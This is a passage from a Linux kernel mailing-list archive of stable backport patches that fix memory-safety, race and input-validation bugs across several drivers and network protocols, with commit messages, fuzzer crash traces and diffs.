[<ffffffff81674dfe>] __vfs_read+0x10e/0x550
[<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
[<ffffffff81674cf0>] ? do_sendfile+0xc50/0xc50
[<ffffffff81745e10>] ? __fsnotify_update_child_dentry_flags+0x60/0x60
[<ffffffff8143fec6>] ? kcov_ioctl+0x56/0x190
[<ffffffff81e5ada2>] ? common_file_perm+0x2e2/0x380
[<ffffffff81746b0e>] ? __fsnotify_parent+0x5e/0x2b0
[<ffffffff81d93536>] ? security_file_permission+0x86/0x1e0
[<ffffffff816728f5>] ? rw_verify_area+0xe5/0x2b0
[<ffffffff81675355>] vfs_read+0x115/0x330
[<ffffffff81676371>] SyS_read+0xd1/0x1a0
[<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
[<ffffffff82001c2c>] ? __this_cpu_preempt_check+0x1c/0x20
[<ffffffff8150455a>] ? __context_tracking_exit.part.4+0x3a/0x1e0
[<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff810052fc>] ? syscall_return_slowpath+0x16c/0x1d0
[<ffffffff83c3276a>] entry_SYSCALL64_slow_path+0x25/0x25
==================================================================

There are a couple of problems that I can see:

- ioctl(SNDRV_TIMER_IOCTL_SELECT), which potentially sets
tu->queue/tu->tqueue to NULL on memory allocation failure, so read()
would get a NULL pointer dereference like the above splat

- the same ioctl() can free tu->queue/to->tqueue which means read()
could potentially see (and dereference) the freed pointer

We can fix both by taking the ioctl_lock mutex when dereferencing
->queue/->tqueue, since that's always held over all the ioctl() code.

Just looking at the code I find it likely that there are more problems
here such as tu->qhead pointing outside the buffer if the size is
changed concurrently using SNDRV_TIMER_IOCTL_PARAMS.

[js] unlock in fail paths

Signed-off-by: Vegard Nossum <***@oracle.com>
Signed-off-by: Takashi Iwai <***@suse.de>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
sound/core/timer.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index 3476895..f5ddc9b 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -1922,19 +1922,23 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
if (err < 0)
goto _error;

+ mutex_lock(&tu->ioctl_lock);
if (tu->tread) {
if (copy_to_user(buffer, &tu->tqueue[tu->qhead++],
sizeof(struct snd_timer_tread))) {
+ mutex_unlock(&tu->ioctl_lock);
err = -EFAULT;
goto _error;
}
} else {
if (copy_to_user(buffer, &tu->queue[tu->qhead++],
sizeof(struct snd_timer_read))) {
+ mutex_unlock(&tu->ioctl_lock);
err = -EFAULT;
goto _error;
}
}
+ mutex_unlock(&tu->ioctl_lock);

tu->qhead %= tu->queue_size;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Long Li <***@microsoft.com>

commit 407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.

The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there maybe multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that maybe pending.

Signed-off-by: Long Li <***@microsoft.com>
Signed-off-by: K. Y. Srinivasan <***@microsoft.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/hv/hv_util.c | 10 +++++++---
1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/drivers/hv/hv_util.c b/drivers/hv/hv_util.c
index 64c778f..5f69c83 100644
--- a/drivers/hv/hv_util.c
+++ b/drivers/hv/hv_util.c
@@ -244,10 +244,14 @@ static void heartbeat_onchannelcallback(void *context)
struct heartbeat_msg_data *heartbeat_msg;
u8 *hbeat_txf_buf = util_heartbeat.recv_buffer;

- vmbus_recvpacket(channel, hbeat_txf_buf,
- PAGE_SIZE, &recvlen, &requestid);
+ while (1) {
+
+ vmbus_recvpacket(channel, hbeat_txf_buf,
+ PAGE_SIZE, &recvlen, &requestid);
+
+ if (!recvlen)
+ break;

- if (recvlen > 0) {
icmsghdrp = (struct icmsg_hdr *)&hbeat_txf_buf[
sizeof(struct vmbuspipe_hdr)];
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit 346da62cc186c4b4b1ac59f87f4482b47a047388 upstream.

Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
[<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e63
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <***@google.com>
Reported-by: Andrey Konovalov <***@google.com>
Tested-by: Andrey Konovalov <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/dccp/proto.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/net/dccp/proto.c b/net/dccp/proto.c
index 6c7c78b8..cb55fb9 100644
--- a/net/dccp/proto.c
+++ b/net/dccp/proto.c
@@ -1012,6 +1012,10 @@ void dccp_close(struct sock *sk, long timeout)
__kfree_skb(skb);
}

+ /* If socket has been already reset kill it. */
+ if (sk->sk_state == DCCP_CLOSED)
+ goto adjudge_to_death;
+
if (data_was_unread) {
/* Unread data was tossed, send an appropriate Reset Code */
DCCP_WARN("ABORT with %u bytes unread\n", data_was_unread);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Jeff Mahoney <***@suse.com>

commit 0a11b9aae49adf1f952427ef1a1d9e793dd6ffb6 upstream.

new_insert_key only makes any sense when it's associated with a
new_insert_ptr, which is initialized to NULL and changed to a
buffer_head when we also initialize new_insert_key. We can key off of
that to avoid the uninitialized warning.

Link: http://lkml.kernel.org/r/5eca5ffb-2155-8df2-b4a2-***@suse.com
Signed-off-by: Jeff Mahoney <***@suse.com>
Cc: Arnd Bergmann <***@arndb.de>
Cc: Jan Kara <***@suse.cz>
Cc: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/reiserfs/ibalance.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/reiserfs/ibalance.c b/fs/reiserfs/ibalance.c
index e1978fd..58cce0c 100644
--- a/fs/reiserfs/ibalance.c
+++ b/fs/reiserfs/ibalance.c
@@ -1082,8 +1082,9 @@ int balance_internal(struct tree_balance *tb, /* tree_balance structure
insert_ptr);
}

- memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);
insert_ptr[0] = new_insert_ptr;
+ if (new_insert_ptr)
+ memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE);

return order;
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Eric Dumazet <***@google.com>

commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <***@google.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/dccp/ipv4.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
index ebc54fe..294c642 100644
--- a/net/dccp/ipv4.c
+++ b/net/dccp/ipv4.c
@@ -212,7 +212,7 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
{
const struct iphdr *iph = (struct iphdr *)skb->data;
const u8 offset = iph->ihl << 2;
- const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+ const struct dccp_hdr *dh;
struct dccp_sock *dp;
struct inet_sock *inet;
const int type = icmp_hdr(skb)->type;
@@ -222,11 +222,13 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
int err;
struct net *net = dev_net(skb->dev);

- if (skb->len < offset + sizeof(*dh) ||
- skb->len < offset + __dccp_basic_hdr_len(dh)) {
- ICMP_INC_STATS_BH(net, ICMP_MIB_INERRORS);
- return;
- }
+ /* Only need dccph_dport & dccph_sport which are the first
+ * 4 bytes in dccp header.
+ * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+ */
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+ dh = (struct dccp_hdr *)(skb->data + offset);

sk = inet_lookup(net, &dccp_hashinfo,
iph->daddr, dh->dccph_dport,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Petr Vandrovec <***@vandrovec.name>

commit 2ce9d2272b98743b911196c49e7af5841381c206 upstream.

Some code (all error handling) submits CDBs that are allocated
on the stack. This breaks with CB/CBI code that tries to create
URB directly from SCSI command buffer - which happens to be in
vmalloced memory with vmalloced kernel stacks.

Let's make copy of the command in usb_stor_CB_transport.

Signed-off-by: Petr Vandrovec <***@vandrovec.name>
Acked-by: Alan Stern <***@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <***@linuxfoundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/storage/transport.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/storage/transport.c b/drivers/usb/storage/transport.c
index b1d815e..8988b26 100644
--- a/drivers/usb/storage/transport.c
+++ b/drivers/usb/storage/transport.c
@@ -919,10 +919,15 @@ int usb_stor_CB_transport(struct scsi_cmnd *srb, struct us_data *us)

/* COMMAND STAGE */
/* let's send the command via the control pipe */
+ /*
+ * Command is sometime (f.e. after scsi_eh_prep_cmnd) on the stack.
+ * Stack may be vmallocated. So no DMA for us. Make a copy.
+ */
+ memcpy(us->iobuf, srb->cmnd, srb->cmd_len);
result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe,
US_CBI_ADSC,
USB_TYPE_CLASS | USB_RECIP_INTERFACE, 0,
- us->ifnum, srb->cmnd, srb->cmd_len);
+ us->ifnum, us->iobuf, srb->cmd_len);

/* check the return code for the command */
usb_stor_dbg(us, "Call to usb_stor_ctrl_transfer() returned %d\n",
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Erez Shitrit <***@mellanox.com>

commit 68c6bcdd8bd00394c234b915ab9b97c74104130c upstream.

The function send_leave sets the member: group->query_id
(group->query_id = ret) after calling the sa_query, but leave_handler
can be executed before the setting and it might delete the group object,
and will get a memory corruption.

Additionally, this patch gets rid of group->query_id variable which is
not used.

Fixes: faec2f7b96b5 ('IB/sa: Track multicast join/leave requests')
Signed-off-by: Erez Shitrit <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/core/multicast.c | 13 ++-----------
1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/drivers/infiniband/core/multicast.c b/drivers/infiniband/core/multicast.c
index d2360a8..180d7f4 100644
--- a/drivers/infiniband/core/multicast.c
+++ b/drivers/infiniband/core/multicast.c
@@ -106,7 +106,6 @@ struct mcast_group {
atomic_t refcount;
enum mcast_group_state state;
struct ib_sa_query *query;
- int query_id;
u16 pkey_index;
u8 leave_state;
int retries;
@@ -339,11 +338,7 @@ static int send_join(struct mcast_group *group, struct mcast_member *member)
member->multicast.comp_mask,
3000, GFP_KERNEL, join_handler, group,
&group->query);
- if (ret >= 0) {
- group->query_id = ret;
- ret = 0;
- }
- return ret;
+ return (ret > 0) ? 0 : ret;
}

static int send_leave(struct mcast_group *group, u8 leave_state)
@@ -363,11 +358,7 @@ static int send_leave(struct mcast_group *group, u8 leave_state)
IB_SA_MCMEMBER_REC_JOIN_STATE,
3000, GFP_KERNEL, leave_handler,
group, &group->query);
- if (ret >= 0) {
- group->query_id = ret;
- ret = 0;
- }
- return ret;
+ return (ret > 0) ? 0 : ret;
}

static void join_group(struct mcast_group *group, struct mcast_member *member,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Stefan Richter <***@s5r6.in-berlin.de>

commit 667121ace9dbafb368618dbabcf07901c962ddac upstream.

The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams. A maliciously formed fragment
with a respectively large datagram_offset would cause a memcpy past the
datagram buffer.

So, drop any packets carrying a fragment with offset + length larger
than datagram_size.

In addition, ensure that
- GASP header, unfragmented encapsulation header, or fragment
encapsulation header actually exists before we access it,
- the encapsulated datagram or fragment is of nonzero size.

Reported-by: Eyal Itkin <***@gmail.com>
Reviewed-by: Eyal Itkin <***@gmail.com>
Fixes: CVE 2016-8633
Signed-off-by: Stefan Richter <***@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/firewire/net.c | 51 ++++++++++++++++++++++++++++++++++----------------
1 file changed, 35 insertions(+), 16 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 7bdb6fe6..70a716e 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -591,6 +591,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
int retval;
u16 ether_type;

+ if (len <= RFC2374_UNFRAG_HDR_SIZE)
+ return 0;
+
hdr.w0 = be32_to_cpu(buf[0]);
lf = fwnet_get_hdr_lf(&hdr);
if (lf == RFC2374_HDR_UNFRAG) {
@@ -615,7 +618,12 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
return fwnet_finish_incoming_packet(net, skb, source_node_id,
is_broadcast, ether_type);
}
+
/* A datagram fragment has been received, now the fun begins. */
+
+ if (len <= RFC2374_FRAG_HDR_SIZE)
+ return 0;
+
hdr.w1 = ntohl(buf[1]);
buf += 2;
len -= RFC2374_FRAG_HDR_SIZE;
@@ -629,6 +637,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
datagram_label = fwnet_get_hdr_dgl(&hdr);
dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */

+ if (fg_off + len > dg_size)
+ return 0;
+
spin_lock_irqsave(&dev->lock, flags);

peer = fwnet_peer_find_by_node_id(dev, source_node_id, generation);
@@ -735,6 +746,22 @@ static void fwnet_receive_packet(struct fw_card *card, struct fw_request *r,
fw_send_response(card, r, rcode);
}

+static int gasp_source_id(__be32 *p)
+{
+ return be32_to_cpu(p[0]) >> 16;
+}
+
+static u32 gasp_specifier_id(__be32 *p)
+{
+ return (be32_to_cpu(p[0]) & 0xffff) << 8 |
+ (be32_to_cpu(p[1]) & 0xff000000) >> 24;
+}
+
+static u32 gasp_version(__be32 *p)
+{
+ return be32_to_cpu(p[1]) & 0xffffff;
+}
+
static void fwnet_receive_broadcast(struct fw_iso_context *context,
u32 cycle, size_t header_length, void *header, void *data)
{
@@ -744,9 +771,6 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
__be32 *buf_ptr;
int retval;
u32 length;
- u16 source_node_id;
- u32 specifier_id;
- u32 ver;
unsigned long offset;
unsigned long flags;

@@ -763,22 +787,17 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,

spin_unlock_irqrestore(&dev->lock, flags);

- specifier_id = (be32_to_cpu(buf_ptr[0]) & 0xffff) << 8
- | (be32_to_cpu(buf_ptr[1]) & 0xff000000) >> 24;
- ver = be32_to_cpu(buf_ptr[1]) & 0xffffff;
- source_node_id = be32_to_cpu(buf_ptr[0]) >> 16;
-
- if (specifier_id == IANA_SPECIFIER_ID &&
- (ver == RFC2734_SW_VERSION
+ if (length > IEEE1394_GASP_HDR_SIZE &&
+ gasp_specifier_id(buf_ptr) == IANA_SPECIFIER_ID &&
+ (gasp_version(buf_ptr) == RFC2734_SW_VERSION
#if IS_ENABLED(CONFIG_IPV6)
- || ver == RFC3146_SW_VERSION
+ || gasp_version(buf_ptr) == RFC3146_SW_VERSION
#endif
- )) {
- buf_ptr += 2;
- length -= IEEE1394_GASP_HDR_SIZE;
- fwnet_incoming_packet(dev, buf_ptr, length, source_node_id,
+ ))
+ fwnet_incoming_packet(dev, buf_ptr + 2,
+ length - IEEE1394_GASP_HDR_SIZE,
+ gasp_source_id(buf_ptr),
context->card->generation, true);
- }

packet.payload_length = dev->rcv_buffer_size;
packet.interrupt = 1;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Peter Ujfalusi <***@ti.com>

commit a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.

Fixes: ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")

Managed irq request will not doing any good in ASoC probe level as it is
not going to free up the irq when the driver is unbound from the sound
card.

Signed-off-by: Peter Ujfalusi <***@ti.com>
Reported-by: Russell King <***@armlinux.org.uk>
Signed-off-by: Mark Brown <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
sound/soc/omap/omap-mcpdm.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/sound/soc/omap/omap-mcpdm.c b/sound/soc/omap/omap-mcpdm.c
index eb05c7e..5dc6b23 100644
--- a/sound/soc/omap/omap-mcpdm.c
+++ b/sound/soc/omap/omap-mcpdm.c
@@ -393,8 +393,8 @@ static int omap_mcpdm_probe(struct snd_soc_dai *dai)
pm_runtime_get_sync(mcpdm->dev);
omap_mcpdm_write(mcpdm, MCPDM_REG_CTRL, 0x00);

- ret = devm_request_irq(mcpdm->dev, mcpdm->irq, omap_mcpdm_irq_handler,
- 0, "McPDM", (void *)mcpdm);
+ ret = request_irq(mcpdm->irq, omap_mcpdm_irq_handler, 0, "McPDM",
+ (void *)mcpdm);

pm_runtime_put_sync(mcpdm->dev);

@@ -414,6 +414,7 @@ static int omap_mcpdm_remove(struct snd_soc_dai *dai)
{
struct omap_mcpdm *mcpdm = snd_soc_dai_get_drvdata(dai);

+ free_irq(mcpdm->irq, (void *)mcpdm);
pm_runtime_disable(mcpdm->dev);

return 0;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Linus Walleij <***@linaro.org>

commit 7ac61a062f3147dc23e3f12b9dfe7c4dd35f9cb8 upstream.

Any readings from the raw interface of the KXSD9 driver will
return an empty string, because it does not return
IIO_VAL_INT but rather some random value from the accelerometer
to the caller.

Signed-off-by: Linus Walleij <***@linaro.org>
Signed-off-by: Jonathan Cameron <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/iio/accel/kxsd9.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index a22c427..d94c0ca 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -160,6 +160,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
if (ret < 0)
goto error_ret;
*val = ret;
+ ret = IIO_VAL_INT;
break;
case IIO_CHAN_INFO_SCALE:
ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Christian König <***@amd.com>

commit 13f479b9df4e2bbf2d16e7e1b02f3f55f70e2455 upstream.

This bug seems to be present for a very long time.

Signed-off-by: Christian König <***@amd.com>
Reviewed-by: Alex Deucher <***@amd.com>
Signed-off-by: Alex Deucher <***@amd.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/gpu/drm/radeon/radeon_ttm.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/radeon/radeon_ttm.c b/drivers/gpu/drm/radeon/radeon_ttm.c
index f701559..6c92c20 100644
--- a/drivers/gpu/drm/radeon/radeon_ttm.c
+++ b/drivers/gpu/drm/radeon/radeon_ttm.c
@@ -228,8 +228,8 @@ static int radeon_move_blit(struct ttm_buffer_object *bo,

rdev = radeon_get_rdev(bo->bdev);
ridx = radeon_copy_ring_index(rdev);
- old_start = old_mem->start << PAGE_SHIFT;
- new_start = new_mem->start << PAGE_SHIFT;
+ old_start = (u64)old_mem->start << PAGE_SHIFT;
+ new_start = (u64)new_mem->start << PAGE_SHIFT;

switch (old_mem->mem_type) {
case TTM_PL_VRAM:
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:05 UTC
Permalink
From: Peter Zijlstra <***@infradead.org>

commit c3c87e770458aa004bd7ed3f29945ff436fd6511 upstream.

The fix from 9fc81d87420d ("perf: Fix events installation during
moving group") was incomplete in that it failed to recognise that
creating a group with events for different CPUs is semantically
broken -- they cannot be co-scheduled.

Furthermore, it leads to real breakage where, when we create an event
for CPU Y and then migrate it to form a group on CPU X, the code gets
confused where the counter is programmed -- triggered in practice
as well by me via the perf fuzzer.

Fix this by tightening the rules for creating groups. Only allow
grouping of counters that can be co-scheduled in the same context.
This means for the same task and/or the same cpu.

Fixes: 9fc81d87420d ("perf: Fix events installation during moving group")
Signed-off-by: Peter Zijlstra (Intel) <***@infradead.org>
Cc: Arnaldo Carvalho de Melo <***@kernel.org>
Cc: Jiri Olsa <***@redhat.com>
Cc: Linus Torvalds <***@linux-foundation.org>
Link: http://lkml.kernel.org/r/***@infradead.org
Signed-off-by: Ingo Molnar <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/perf_event.h | 6 ------
kernel/events/core.c | 15 +++++++++++++--
2 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
index 229a757..3204422 100644
--- a/include/linux/perf_event.h
+++ b/include/linux/perf_event.h
@@ -430,11 +430,6 @@ struct perf_event {
#endif /* CONFIG_PERF_EVENTS */
};

-enum perf_event_context_type {
- task_context,
- cpu_context,
-};
-
/**
* struct perf_event_context - event context structure
*
@@ -442,7 +437,6 @@ enum perf_event_context_type {
*/
struct perf_event_context {
struct pmu *pmu;
- enum perf_event_context_type type;
/*
* Protect the states of the events in the list,
* nr_active, and the list:
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 0f52078..76e26b8 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -6249,7 +6249,6 @@ skip_type:
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
- cpuctx->ctx.type = cpu_context;
cpuctx->ctx.pmu = pmu;
cpuctx->jiffies_interval = 1;
INIT_LIST_HEAD(&cpuctx->rotation_list);
@@ -6856,7 +6855,19 @@ SYSCALL_DEFINE5(perf_event_open,
* task or CPU context:
*/
if (move_group) {
- if (group_leader->ctx->type != ctx->type)
+ /*
+ * Make sure we're both on the same task, or both
+ * per-cpu events.
+ */
+ if (group_leader->ctx->task != ctx->task)
+ goto err_context;
+
+ /*
+ * Make sure we're both events for the same CPU;
+ * grouping events for different CPUs is broken; since
+ * you can never concurrently schedule them anyhow.
+ */
+ if (group_leader->cpu != event->cpu)
goto err_context;
} else {
if (group_leader->ctx != ctx)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Michal Kubecek <***@suse.cz>

commit be2cef49904b34dd5f75d96bbc8cd8341bab1bc0 upstream.

Some users observed that "least connection" distribution algorithm doesn't
handle well bursts of TCP connections from reconnecting clients after
a node or network failure.

This is because the algorithm counts active connection as worth 256
inactive ones where for TCP, "active" only means TCP connections in
ESTABLISHED state. In case of a connection burst, new connections are
handled before previous ones have finished the three way handshaking so
that all are still counted as "inactive", i.e. cheap ones. The become
"active" quickly but at that time, all of them are already assigned to one
real server (or few), resulting in highly unbalanced distribution.

Address this by counting the "pre-established" states as "active".

Signed-off-by: Michal Kubecek <***@suse.cz>
Acked-by: Julian Anastasov <***@ssi.bg>
Signed-off-by: Simon Horman <***@verge.net.au>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/netfilter/ipvs/ip_vs_proto_tcp.c | 25 +++++++++++++++++++++++--
1 file changed, 23 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c
index 50a1594..3032ede 100644
--- a/net/netfilter/ipvs/ip_vs_proto_tcp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c
@@ -373,6 +373,20 @@ static const char *const tcp_state_name_table[IP_VS_TCP_S_LAST+1] = {
[IP_VS_TCP_S_LAST] = "BUG!",
};

+static const bool tcp_state_active_table[IP_VS_TCP_S_LAST] = {
+ [IP_VS_TCP_S_NONE] = false,
+ [IP_VS_TCP_S_ESTABLISHED] = true,
+ [IP_VS_TCP_S_SYN_SENT] = true,
+ [IP_VS_TCP_S_SYN_RECV] = true,
+ [IP_VS_TCP_S_FIN_WAIT] = false,
+ [IP_VS_TCP_S_TIME_WAIT] = false,
+ [IP_VS_TCP_S_CLOSE] = false,
+ [IP_VS_TCP_S_CLOSE_WAIT] = false,
+ [IP_VS_TCP_S_LAST_ACK] = false,
+ [IP_VS_TCP_S_LISTEN] = false,
+ [IP_VS_TCP_S_SYNACK] = true,
+};
+
#define sNO IP_VS_TCP_S_NONE
#define sES IP_VS_TCP_S_ESTABLISHED
#define sSS IP_VS_TCP_S_SYN_SENT
@@ -396,6 +410,13 @@ static const char * tcp_state_name(int state)
return tcp_state_name_table[state] ? tcp_state_name_table[state] : "?";
}

+static bool tcp_state_active(int state)
+{
+ if (state >= IP_VS_TCP_S_LAST)
+ return false;
+ return tcp_state_active_table[state];
+}
+
static struct tcp_states_t tcp_states [] = {
/* INPUT */
/* sNO, sES, sSS, sSR, sFW, sTW, sCL, sCW, sLA, sLI, sSA */
@@ -518,12 +539,12 @@ set_tcp_state(struct ip_vs_proto_data *pd, struct ip_vs_conn *cp,

if (dest) {
if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
- (new_state != IP_VS_TCP_S_ESTABLISHED)) {
+ !tcp_state_active(new_state)) {
atomic_dec(&dest->activeconns);
atomic_inc(&dest->inactconns);
cp->flags |= IP_VS_CONN_F_INACTIVE;
} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
- (new_state == IP_VS_TCP_S_ESTABLISHED)) {
+ tcp_state_active(new_state)) {
atomic_inc(&dest->activeconns);
atomic_dec(&dest->inactconns);
cp->flags &= ~IP_VS_CONN_F_INACTIVE;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:06 UTC
Permalink
From: Peter Zijlstra <***@infradead.org>

